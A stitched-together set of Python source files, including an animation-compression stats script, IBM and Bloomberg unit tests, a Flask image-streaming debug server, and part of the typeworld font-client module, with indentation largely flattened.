filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
    sys.stdout.write('\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix))
if iteration == total:
sys.stdout.write('\n')
sys.stdout.flush()
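# Minimal usage sketch for print_progress() (illustrative; not called by the
# script): invoke it once per iteration. The leading '\r' redraws the bar in
# place, and the final call with iteration == total emits the newline.
def _example_progress_demo(total=5):
    for i in range(total + 1):
        print_progress(i, total, 'Demo:', '{} / {}'.format(i, total))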
def run_acl_compressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
os.system(cmd)
result_queue.put(acl_filename)
def compress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
refresh = options['refresh']
if platform.system() == 'Windows':
compressor_exe_path = '../../build/bin/acl_compressor.exe'
else:
compressor_exe_path = '../../build/bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
acl_filename = os.path.join(dirpath, filename)
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
cmd = '{} -acl="{}" -stats="{}"'.format(compressor_exe_path, acl_filename, stat_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to compress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
    compression_start_time = time.perf_counter()
threads = [ threading.Thread(target = run_acl_compressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(stat_files), 'Compressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
print_progress(num_processed, len(stat_files), 'Compressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
                if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
    compression_end_time = time.perf_counter()
print()
print('Compressed {} clips in {}'.format(len(stat_files), format_elapsed_time(compression_end_time - compression_start_time)))
return stat_files
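# Sketch of the sentinel shutdown pattern used by compress_clips() above
# (illustrative, standalone): each worker loops on Queue.get() and exits when
# it pops a None marker, so queueing one None per thread drains the pool.
def _example_sentinel_pool(num_threads=2):
    work = queue.Queue()
    results = queue.Queue()
    def worker():
        while True:
            item = work.get()
            if item is None:
                return  # sentinel: shut this worker down
            results.put(item * 2)
    for item in (1, 2, 3):
        work.put(item)
    for _ in range(num_threads):
        work.put(None)  # one sentinel per worker
    workers = [threading.Thread(target=worker) for _ in range(num_threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    out = []
    while not results.empty():
        out.append(results.get())
    return sorted(out)  # [2, 4, 6]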
def shorten_range_reduction(range_reduction):
if range_reduction == 'RangeReduction::None':
return 'RR:None'
elif range_reduction == 'RangeReduction::Rotations':
return 'RR:Rot'
elif range_reduction == 'RangeReduction::Translations':
return 'RR:Trans'
elif range_reduction == 'RangeReduction::Scales':
return 'RR:Scale'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Translations':
return 'RR:Rot|Trans'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Scales':
return 'RR:Rot|Scale'
elif range_reduction == 'RangeReduction::Translations | RangeReduction::Scales':
return 'RR:Trans|Scale'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Translations | RangeReduction::Scales':
return 'RR:Rot|Trans|Scale'
else:
return 'RR:???'
def shorten_rotation_format(format):
if format == 'Quat 128':
return 'R:Quat'
elif format == 'Quat Drop W 96':
return 'R:QuatNoW96'
elif format == 'Quat Drop W 48':
return 'R:QuatNoW48'
elif format == 'Quat Drop W 32':
return 'R:QuatNoW32'
elif format == 'Quat Drop W Variable':
return 'R:QuatNoWVar'
else:
return 'R:???'
def shorten_translation_format(format):
if format == 'Vector3 96':
return 'T:Vec3_96'
elif format == 'Vector3 48':
return 'T:Vec3_48'
elif format == 'Vector3 32':
return 'T:Vec3_32'
elif format == 'Vector3 Variable':
return 'T:Vec3Var'
else:
return 'T:???'
def shorten_scale_format(format):
if format == 'Vector3 96':
return 'S:Vec3_96'
elif format == 'Vector3 48':
return 'S:Vec3_48'
elif format == 'Vector3 32':
return 'S:Vec3_32'
elif format == 'Vector3 Variable':
return 'S:Vec3Var'
else:
return 'S:???'
def aggregate_stats(agg_run_stats, run_stats):
algorithm_uid = run_stats['algorithm_uid']
if not algorithm_uid in agg_run_stats:
agg_data = {}
agg_data['name'] = run_stats['desc']
agg_data['csv_name'] = run_stats['csv_desc']
agg_data['total_raw_size'] = 0
agg_data['total_compressed_size'] = 0
agg_data['total_compression_time'] = 0.0
agg_data['total_duration'] = 0.0
agg_data['max_error'] = 0
agg_data['num_runs'] = 0
agg_data['bit_rates'] = [0] * 19
agg_run_stats[algorithm_uid] = agg_data
agg_data = agg_run_stats[algorithm_uid]
agg_data['total_raw_size'] += run_stats['raw_size']
agg_data['total_compressed_size'] += run_stats['compressed_size']
agg_data['total_compression_time'] += run_stats['compression_time']
agg_data['total_duration'] += run_stats['duration']
agg_data['max_error'] = max(agg_data['max_error'], run_stats['max_error'])
agg_data['num_runs'] += 1
if 'segments' in run_stats and len(run_stats['segments']) > 0:
for segment in run_stats['segments']:
if 'bit_rate_counts' in segment:
for i in range(19):
agg_data['bit_rates'][i] += segment['bit_rate_counts'][i]
def track_best_runs(best_runs, run_stats):
if run_stats['max_error'] < best_runs['best_error']:
best_runs['best_error'] = run_stats['max_error']
best_runs['best_error_entry'] = run_stats
if run_stats['compression_ratio'] > best_runs['best_ratio']:
best_runs['best_ratio'] = run_stats['compression_ratio']
best_runs['best_ratio_entry'] = run_stats
def track_worst_runs(worst_runs, run_stats):
if run_stats['max_error'] > worst_runs['worst_error']:
worst_runs['worst_error'] = run_stats['max_error']
worst_runs['worst_error_entry'] = run_stats
if run_stats['compression_ratio'] < worst_runs['worst_ratio']:
worst_runs['worst_ratio'] = run_stats['compression_ratio']
worst_runs['worst_ratio_entry'] = run_stats
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
agg_run_stats = {}
best_runs = {}
best_runs['best_error'] = 100000000.0
best_runs['best_error_entry'] = None
best_runs['best_ratio'] = 0.0
best_runs['best_ratio_entry'] = None
worst_runs = {}
worst_runs['worst_error'] = -100000000.0
worst_runs['worst_error_entry'] = None
worst_runs['worst_ratio'] = 100000000.0
worst_runs['worst_ratio_entry'] = None
num_runs = 0
total_compression_time = 0.0
stats_summary_data = []
stats_error_data = []
stats_animated_size = []
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
run_stats['range_reduction'] = shorten_range_reduction(run_stats['range_reduction'])
run_stats['filename'] = stat_filename
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
run_stats['rotation_format'] = shorten_rotation_format(run_stats['rotation_format'])
run_stats['translation_format'] = shorten_translation_format(run_stats['translation_format'])
run_stats['scale_format'] = shorten_scale_format(run_stats['scale_format'])
if 'segmenting' in run_stats:
run_stats['segmenting']['range_reduction'] = shorten_range_reduction(run_stats['segmenting']['range_reduction'])
run_stats['desc'] = '{}|{}|{}, Clip {}, Segment {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'], run_stats['segmenting']['range_reduction'])
run_stats['csv_desc'] = '{}|{}|{} Clip {} Segment {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'], run_stats['segmenting']['range_reduction'])
else:
run_stats['desc'] = '{}|{}|{}, Clip {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'])
run_stats['csv_desc'] = '{}|{}|{} Clip {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'])
aggregate_stats(agg_run_stats, run_stats)
track_best_runs(best_runs, run_stats)
track_worst_runs(worst_runs, run_stats)
num_runs += 1
total_compression_time += run_stats['compression_time']
if options['csv_summary']:
#(name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error)
num_animated_tracks = run_stats.get('num_animated_tracks', 0)
data = (run_stats['csv_desc'], run_stats['raw_size'], run_stats['compressed_size'], run_stats['compression_ratio'], run_stats['compression_time'], run_stats['duration'], num_animated_tracks, run_stats['max_error'])
stats_summary_data.append(data)
if 'segments' in run_stats and len(run_stats['segments']) > 0:
segment_index = 0
for segment in run_stats['segments']:
if 'animated_frame_size' in segment and options['csv_animated_size']:
stats_animated_size.append((run_stats['clip_name'], segment_index, segment['animated_frame_size']))
if 'error_per_frame_and_bone' in segment and len(segment['error_per_frame_and_bone']) > 0:
# Convert to array https://docs.python.org/3/library/array.html
# Lower memory footprint and more efficient
# Drop the data if we don't write the csv files, otherwise aggregate it
if options['csv_error']:
#(name, segment_index, data)
data = (run_stats['clip_name'], segment_index, segment['error_per_frame_and_bone'])
stats_error_data.append(data)
# Data isn't needed anymore, discard it
segment['error_per_frame_and_bone'] = []
segment_index += 1
result_queue.put(('progress', stat_filename))
# Done
results = {}
results['agg_run_stats'] = agg_run_stats
results['best_runs'] = best_runs
results['worst_runs'] = worst_runs
results['num_runs'] = num_runs
results['total_compression_time'] = total_compression_time
results['stats_summary_data'] = stats_summary_data
results['stats_error_data'] = stats_error_data
results['stats_animated_size'] = stats_animated_size
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def pretty_print(d, indent = 0):
for key, value in d.items():
if isinstance(value, dict):
print('\t' * indent + str(key))
            pretty_print(value, indent + 1)
else:
print('\t' * indent + str(key) + ': ' + str(value))
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
agg_job_results['total_compression_time'] += job_results['total_compression_time']
for key in job_results['agg_run_stats'].keys():
agg_job_results['agg_run_stats'][key]['total_raw_size'] += job_results['agg_run_stats'][key]['total_raw_size']
agg_job_results['agg_run_stats'][key]['total_compressed_size'] += job_results['agg_run_stats'][key]['total_compressed_size']
agg_job_results['agg_run_stats'][key]['total_compression_time'] += job_results['agg_run_stats'][key]['total_compression_time']
agg_job_results['agg_run_stats'][key]['total_duration'] += job_results['agg_run_stats'][key]['total_duration']
agg_job_results['agg_run_stats'][key]['max_error'] = max(agg_job_results['agg_run_stats'][key]['max_error'], job_results['agg_run_stats'][key]['max_error'])
agg_job_results['agg_run_stats'][key]['num_runs'] += job_results['agg_run_stats'][key]['num_runs']
for i in range(19):
agg_job_results['agg_run_stats'][key]['bit_rates'][i] += job_results['agg_run_stats'][key]['bit_rates'][i]
if job_results['best_runs']['best_error'] < agg_job_results['best_runs']['best_error']:
agg_job_results['best_runs']['best_error'] = job_results['best_runs']['best_error']
agg_job_results['best_runs']['best_error_entry'] = job_results['best_runs']['best_error_entry']
if job_results['best_runs']['best_ratio'] > agg_job_results['best_runs']['best_ratio']:
agg_job_results['best_runs']['best_ratio'] = job_results['best_runs']['best_ratio']
agg_job_results['best_runs']['best_ratio_entry'] = job_results['best_runs']['best_ratio_entry']
if job_results['worst_runs']['worst_error'] > agg_job_results['worst_runs']['worst_error']:
agg_job_results['worst_runs']['worst_error'] = job_results['worst_runs']['worst_error']
agg_job_results['worst_runs']['worst_error_entry'] = job_results['worst_runs']['worst_error_entry']
if job_results['worst_runs']['worst_ratio'] < agg_job_results['worst_runs']['worst_ratio']:
agg_job_results['worst_runs']['worst_ratio'] = job_results['worst_runs']['worst_ratio']
agg_job_results['worst_runs']['worst_ratio_entry'] = job_results['worst_runs']['worst_ratio_entry']
if __name__ == "__main__":
options = parse_argv()
stat_files = compress_clips(options)
csv_data = create_csv(options)
    aggregating_start_time = time.perf_counter()
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
agg_run_stats = agg_job_results['agg_run_stats']
best_runs = agg_job_results['best_runs']
worst_runs = agg_job_results['worst_runs']
num_runs = agg_job_results['num_runs']
total_compression_time = agg_job_results['total_compression_time']
write_csv(csv_data, agg_run_stats)
    aggregating_end_time = time.perf_counter()
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
print('Stats per run type:')
run_types_by_size = sorted(agg_run_stats.values(), key = lambda entry: entry['total_compressed_size'])
for run_stats in run_types_by_size:
ratio = float(run_stats['total_raw_size']) / float(run_stats['total_compressed_size'])
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}] Run type: {}'.format(bytes_to_mb(run_stats['total_compressed_size']), format_elapsed_time(run_stats['total_compression_time']), ratio, run_stats['max_error'], run_stats['name']))
print()
total_duration = run_types_by_size[0]['total_duration']
total_raw_size = run_types_by_size[0]['total_raw_size']
print('Sum of clip durations: {}'.format(format_elapsed_time(total_duration)))
print('Total compression time: {}'.format(format_elapsed_time(total_compression_time)))
print('Total raw size: {:.2f} MB'.format(bytes_to_mb(total_raw_size)))
print()
print('Most accurate: {}'.format(best_runs['best_error_entry']['filename']))
print_stat(best_runs['best_error_entry'])
print('Best ratio: {}'.format(best_runs['best_ratio_entry']['filename']))
print_stat(best_runs['best_ratio_entry'])
print('Least accurate: {}'.format(worst_runs['worst_error_entry']['filename']))
print_stat(worst_runs['worst_error_entry'])
print('Worst ratio: {}'.format(worst_runs['worst_ratio_entry']['filename']))
print_stat(worst_runs['worst_ratio_entry'])
|
test_notification.py
|
# Copyright 2016-2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for _notification module.
The test strategy is to mock the STOMP connection to the HMC by replacing
stomp.Connection with the MockedStompConnection class defined below.
"""
from __future__ import absolute_import, print_function
import json
import threading
from mock import patch
from zhmcclient._notification import NotificationReceiver
class MockedStompConnection(object):
"""
A class that replaces stomp.Connection for the usage scope in the
zhmcclient._notification module, and that adds the ability to
queue STOMP messages.
"""
def __init__(self, *args, **kwargs):
"""We ignore the args:
[(self._host, self._port)], use_ssl="SSL")
"""
self._state_connected = False
self._listener = None
self._connect_userid = None
self._connect_password = None
self._connect_wait = None
self._subscriptions = [] # items: tuple(dest, id, ack)
self._queued_messages = [] # items: tuple(headers, message_str)
self._sender_thread = None
def set_listener(self, name, listener):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
self._listener = listener
def start(self):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
def connect(self, userid, password, wait):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
self._state_connected = True
self._connect_userid = userid
self._connect_password = password
self._connect_wait = wait
def subscribe(self, destination, id, ack):
"""Mocks the same-named method of stomp.Connection."""
assert self._state_connected
self._subscriptions.append((destination, id, ack))
def disconnect(self):
"""Mocks the same-named method of stomp.Connection."""
assert self._state_connected
self._sender_thread.join()
self._sender_thread = None
self._state_connected = False
def mock_add_message(self, headers, message_obj):
"""Adds a STOMP message to the queue."""
assert self._sender_thread is None
message_str = json.dumps(message_obj)
self._queued_messages.append((headers, message_str))
def mock_start(self):
"""Start the STOMP message sender thread."""
assert self._state_connected
self._sender_thread = threading.Thread(target=self.mock_sender_run)
self._sender_thread.start()
def mock_sender_run(self):
"""Simulates the HMC sending STOMP messages. This method runs in a
separate thread and processes the queued STOMP messages and sends
them to the notification listener set up by the NotificationReceiver
class."""
for msg_item in self._queued_messages:
# The following method blocks until it can deliver a message
headers, message_str = msg_item
self._listener.on_message(headers, message_str)
self._listener.on_disconnected()
def receiver_run(receiver, msg_items):
for headers, message in receiver.notifications():
msg_items.append((headers, message))
return msg_items
def receive_notifications(receiver):
msg_items = []
receiver_thread = threading.Thread(target=receiver_run,
args=(receiver, msg_items))
receiver_thread.start()
receiver.close()
receiver_thread.join(1.0)
if receiver_thread.is_alive():
raise AssertionError("receiver_thread is still alive")
return msg_items
class TestNotification_OneTopic(object):
def setup_method(self):
self.topic = 'fake-topic'
self.hmc = 'fake-hmc'
self.userid = 'fake-userid'
self.password = 'fake-password'
self.std_headers = {
'notification-type': 'fake-type'
}
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_no_messages(self):
receiver = NotificationReceiver(self.topic, self.hmc, self.userid,
self.password)
conn = receiver._conn
# We do not add any STOMP messages
conn.mock_start()
msg_items = receive_notifications(receiver)
assert msg_items == []
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_one_message(self):
receiver = NotificationReceiver(self.topic, self.hmc, self.userid,
self.password)
conn = receiver._conn
# Add one STOMP message to be sent
message_obj = dict(a=1, b=2)
conn.mock_add_message(self.std_headers, message_obj)
conn.mock_start()
msg_items = receive_notifications(receiver)
assert len(msg_items) == 1
msg0 = msg_items[0]
assert msg0[0] == self.std_headers
assert msg0[1] == message_obj
class TestNotification_TwoTopics(object):
def setup_method(self):
self.topics = ('fake-topic1', 'fake-topic2')
self.hmc = 'fake-hmc'
self.userid = 'fake-userid'
self.password = 'fake-password'
self.std_headers = {
'notification-type': 'fake-type'
}
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_no_messages(self):
receiver = NotificationReceiver(self.topics, self.hmc, self.userid,
self.password)
conn = receiver._conn
# We do not add any STOMP messages
conn.mock_start()
msg_items = receive_notifications(receiver)
assert msg_items == []
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_one_message(self):
receiver = NotificationReceiver(self.topics, self.hmc, self.userid,
self.password)
conn = receiver._conn
# Add one STOMP message to be sent
message_obj = dict(a=1, b=2)
conn.mock_add_message(self.std_headers, message_obj)
conn.mock_start()
msg_items = receive_notifications(receiver)
assert len(msg_items) == 1
msg0 = msg_items[0]
assert msg0[0] == self.std_headers
assert msg0[1] == message_obj
|
phlsys_multiprocessing__t.py
|
"""Test suite for phlsys_multiprocessing."""
# =============================================================================
# TEST PLAN
# -----------------------------------------------------------------------------
# Here we detail the things we are concerned to test and specify which tests
# cover those concerns.
#
# Concerns:
# TODO
# -----------------------------------------------------------------------------
# Tests:
# TODO
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import multiprocessing
import unittest
import phlsys_multiprocessing
class Test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_logging_context_breathing(self):
def logger_config():
logging.basicConfig()
with phlsys_multiprocessing.logging_context(logger_config):
logging.debug("logging test")
def test_multiresource_breathing(self):
def factory():
return "resource"
# make sure that we can get a resource in the main process
multi_resource = phlsys_multiprocessing.MultiResource(1, factory)
with multi_resource.resource_context() as resource:
self.assertEqual("resource", resource)
with multi_resource.resource_context() as resource:
self.assertEqual("resource", resource)
def test_multiresource_changes_propagate(self):
def worker(resource):
with resource.resource_context() as r:
r.append("worker process")
def factory():
return ["main process"]
multi_resource = phlsys_multiprocessing.MultiResource(1, factory)
worker_list = []
num_workers = 5
        for _ in range(num_workers):
worker_list.append(
multiprocessing.Process(target=worker, args=(multi_resource,)))
worker_list[-1].start()
for w in worker_list:
w.join()
with multi_resource.resource_context() as r:
self.assertEqual(len(r), num_workers + 1)
# -----------------------------------------------------------------------------
# Copyright (C) 2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
debug_server.py
|
import threading
import cv2
import numpy as np
from flask import Flask, Response, render_template_string, abort
app = Flask(__name__)
image_container = {}
def camera_stream(image_name):
if image_name not in image_container:
return abort(404)
while True:
_, payload = cv2.imencode('.jpg', image_container[image_name])
frame = payload.tobytes()
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
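# Wire-format note (illustrative): each chunk yielded above is one part of a
# multipart/x-mixed-replace stream. The boundary name ("frame") must match
# the boundary declared in video_feed() below, so the browser receives:
#   --frame\r\n
#   Content-Type: image/jpeg\r\n\r\n
#   <jpeg bytes>\r\n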
INDEX_TEMPLATE = """
<body>
<ul>
{% for image_stream in image_stream_list %}
<li>
<a href="{{url_for('stream_page', image_name=image_stream)}}">{{image_stream}}</a>
</li>
{% endfor %}
</ul>
</body>
"""
STREAM_PAGE_TEMPLATE = """
<body>
<img src="{{url_for('video_feed', image_name=image_name)}}" height="100%">
</body>
"""
@app.route('/image_stream/<image_name>')
def video_feed(image_name):
return Response(camera_stream(image_name),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/image_frame/<image_name>')
def video_frame(image_name):
image = image_container.get(image_name, None)
if image is None:
return abort(404)
_, payload = cv2.imencode('.jpg', image)
frame = payload.tobytes()
return Response(frame, mimetype='image/jpeg')
@app.route("/stream_page/<image_name>")
def stream_page(image_name):
return render_template_string(STREAM_PAGE_TEMPLATE, image_name=image_name)
@app.route('/')
def index():
return render_template_string(INDEX_TEMPLATE,
image_stream_list=image_container.keys())
def create_image_server():
"""
Create flask image debug server.
    Warning! This is a very hacky Flask server. Make sure to only run it once, as it uses global state.
Returns:
Dictionary into which you can insert images with string keys
"""
threading.Thread(target=lambda: app.run(host="0.0.0.0", port=8000)).start()
return image_container
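# Usage sketch (illustrative; the key and arrays below are hypothetical):
# start the server once, then keep overwriting entries in the returned dict.
# Each stream page re-encodes whatever array currently sits under its key.
#
#     images = create_image_server()
#     images["camera"] = np.zeros((480, 640, 3), dtype=np.uint8)
#     # ... later, from any thread:
#     images["camera"] = latest_frame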
|
__init__.py
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import copy
import platform
import urllib.request
import urllib.error
import urllib.parse
import traceback
import time
import base64
import threading
import ssl
import certifi
import semver
import logging
import inspect
import re
from time import gmtime, strftime
import http.client as httplib
import stripe.http_client
import typeworld.api
from typeworld.client.helpers import (
ReadFromFile,
WriteToFile,
MachineName,
OSName,
Garbage,
)
WIN = platform.system() == "Windows"
MAC = platform.system() == "Darwin"
LINUX = platform.system() == "Linux"
CI = os.getenv("CI", "false").lower() == "true"
GAE = os.getenv("GAE_ENV", "").startswith("standard")
MOTHERSHIP = "https://api.type.world/v1"
if MAC:
from AppKit import NSUserDefaults
from typeworld.client.helpers import nslog
class DummyKeyring(object):
def __init__(self):
self.passwords = {}
def set_password(self, key, username, password):
self.passwords[(key, username)] = password
def get_password(self, key, username):
if (key, username) in self.passwords:
return self.passwords[(key, username)]
def delete_password(self, key, username):
if (key, username) in self.passwords:
del self.passwords[(key, username)]
dummyKeyRing = DummyKeyring()
if "TRAVIS" in os.environ:
import tempfile
tempFolder = tempfile.mkdtemp()
def urlIsValid(url):
if not url.find("typeworld://") < url.find("+") < url.find("http") < url.find("//", url.find("http")):
return False, "URL is malformed."
if url.count("@") > 1:
return (
False,
"URL contains more than one @ sign, so don’t know how to parse it.",
)
found = False
for protocol in typeworld.api.PROTOCOLS:
if url.startswith(protocol + "://"):
found = True
break
if not found:
return (
False,
"Unknown custom protocol, known are: %s" % (typeworld.api.PROTOCOLS),
)
if url.count("://") > 1:
return (
False,
"URL contains more than one :// combination, so don’t know how to parse it.",
)
return True, None
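# Illustrative example (not part of the library): a well-formed subscription
# URL nests the custom protocol, API protocol and transport protocol, e.g.
# "typeworld://json+https//subscriptionID:secretKey@example.com/api/".
# Assuming "typeworld" is listed in typeworld.api.PROTOCOLS, urlIsValid()
# returns (True, None) for it; the credentials and domain are made up.
def _example_url_validation():
    return urlIsValid("typeworld://json+https//s9lIZsmw:F4ucH2eM@example.com/api/")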
class URL(object):
def __init__(self, url):
(
self.customProtocol,
self.protocol,
self.transportProtocol,
self.subscriptionID,
self.secretKey,
self.accessToken,
self.restDomain,
) = splitJSONURL(url)
def unsecretURL(self):
if self.subscriptionID and self.secretKey:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ ":"
+ "secretKey"
+ "@"
+ str(self.restDomain)
)
elif self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def shortUnsecretURL(self):
if self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def secretURL(self):
if self.subscriptionID and self.secretKey:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ ":"
+ str(self.secretKey)
+ "@"
+ str(self.restDomain)
)
elif self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def HTTPURL(self):
return str(self.transportProtocol) + str(self.restDomain)
def getProtocol(url):
"""\
Loads a protocol plugin from the file system and returns an
instantiated protocol object
"""
protocolName = URL(url).protocol
for ext in (".py", ".pyc"):
if os.path.exists(os.path.join(os.path.dirname(__file__), "protocols", protocolName + ext)):
import importlib
spec = importlib.util.spec_from_file_location(
"json",
os.path.join(os.path.dirname(__file__), "protocols", protocolName + ext),
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
protocolObject = module.TypeWorldProtocol(url)
return True, protocolObject
return False, "Protocol %s doesn’t exist in this app (yet)." % protocolName
def request(url, parameters={}, method="POST", timeout=30):
"""Perform request in a loop 10 times, because the central server’s instance might
shut down unexpectedly during a request, especially longer running ones."""
client = stripe.http_client.new_default_http_client(timeout=timeout)
message = None
tries = 10
for i in range(tries):
try:
# This is awkward, but currently the only workaround:
# I can't get GAE to accept http requests coming from itself, such as
# when typeworld is loaded as a module inside type.world and then
# needs to access type.world for communication.
# Thus, we're routing all internal traffic directly to flask via its
# test_client():
try:
import typeworldserver
print("typeworld in GAE")
GAE = True
except ImportError:
GAE = False
if GAE and ("api.type.world" in url or "typeworld2.appspot.com" in url):
print("routing internally to flask")
if "api.type.world" in url:
url = url.split("api.type.world")[-1]
elif "typeworld2.appspot.com" in url:
url = url.split("typeworld2.appspot.com")[-1]
with typeworldserver.app.test_client() as c:
if method == "POST":
response = c.post(url, data=parameters)
return True, response.data, response.headers
elif method == "GET":
response = c.get(url)
return True, response.data, response.headers
            content, status_code, headers = client.request(method, url, {}, parameters)
            break  # success; exit the retry loop
except Exception:
# Continue the loop directly unless this is last round
if i < tries - 1:
continue
# Output error message
if parameters:
parameters = copy.copy(parameters)
for key in parameters:
if key.lower().endswith("key"):
parameters[key] = "*****"
if key.lower().endswith("secret"):
parameters[key] = "*****"
message = (
f"Response from {url} with parameters {parameters} after {i+1} tries: "
+ traceback.format_exc().splitlines()[-1]
)
else:
message = traceback.format_exc().splitlines()[-1]
return False, message, None
client.close()
if status_code == 200:
return True, content, headers
else:
return False, f"HTTP Error {status_code}", headers
# try:
# # This is awkward, but currently the only workaround:
# # I can't get GAE to accept http requests coming from itself, such as
# # when typeworld is loaded as a module inside type.world and then
# # needs to access type.world for communication.
